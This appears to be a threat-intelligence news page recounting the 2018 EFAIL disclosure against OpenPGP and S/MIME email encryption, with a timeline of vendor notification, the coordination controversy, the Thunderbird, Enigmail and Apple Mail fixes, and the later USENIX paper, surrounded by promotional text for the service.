Researchers disclosed EFAIL, a set of attacks that can cause some email clients to leak the plaintext of previously intercepted OpenPGP- and S/MIME-encrypted messages. The attacks relied on clients automatically rendering active HTML content and, in some cases, weaknesses around message integrity handling, allowing crafted emails to exfiltrate decrypted content to attacker-controlled servers when a victim opened them. Reporting and follow-up commentary identified affected workflows in clients including Thunderbird and Apple Mail, and warned that simply using encrypted email standards did not guarantee protection if the surrounding client behavior was unsafe.
The disclosure triggered immediate controversy over both severity and coordination. The EFF and other outlets urged users to disable HTML rendering and, as a precaution, avoid decrypting inside vulnerable mail clients, while researchers and developers said encryption could still be used more safely if messages were handled outside the email application. Enigmail's lead developer said fixes for Enigmail had already shipped while Thunderbird patches were still being finalized, and criticized the publication process for alarming users without clear mitigation guidance; subsequent reporting also said Apple Mail offered no practical defense against the attack at the client level beyond changing how encrypted mail was viewed.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
10 events from the most recent confirmed update back to the earliest known activity.
The Efail work was later formally presented as 'Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels' at USENIX Security, documenting the attack techniques against encrypted email ecosystems.
On May 25, 2018, reporting highlighted that Apple Mail messages could not be effectively protected against EFAIL within the client, underscoring ongoing exposure for users of Apple's mail software.
Enigmail-specific vulnerabilities were remediated relatively quickly in Enigmail 1.9.9 and 2.0, according to the project's lead developer. Thunderbird-side fixes took longer because of limited development capacity and major code changes.
By May 16-17, commentary from security experts and media criticized the handling of the Efail announcement, focusing on whether the disclosure overstated the flaws and created unnecessary panic relative to the practical mitigations available.
In a May 15 interview, Enigmail's lead developer said vendors were not told the publication date in advance and that users were alarmed without practical mitigation guidance. He also argued that disabling plugins alone was insufficient because Thunderbird's built-in S/MIME support remained exposed.
On the day of public disclosure, Thunderbird said a patch for the last known exploit vector had been submitted for review and testing, with an update expected before the end of that week.
At disclosure, the researchers recommended temporarily disabling PGP support inside email applications, while noting users could still exchange encrypted mail if encryption and decryption were performed outside the email client.
On May 14, 2018, researchers and media publicly disclosed Efail attacks against S/MIME and OpenPGP email workflows, warning that crafted emails could exfiltrate plaintext from previously obtained encrypted messages when opened in vulnerable clients.
Brunschwig said the researchers provided further information in February 2018 about MDC-related weaknesses affecting the broader Efail attack set.
According to Enigmail lead developer Patrick Brunschwig, Sebastian Schinzel’s group first informed him in November 2017 about attacks in which Thunderbird could load a URL and leak decrypted email content through HTML handling.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
7 references tracked. Mallory keeps watching after this page renders.
usenix.org
Open sourcetheintercept.com
Open sourceblog.cryptographyengineering.com
Open sourceheise.de
Open sourceheise.de
Open sourcearstechnica.com
Open sourceeff.org
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.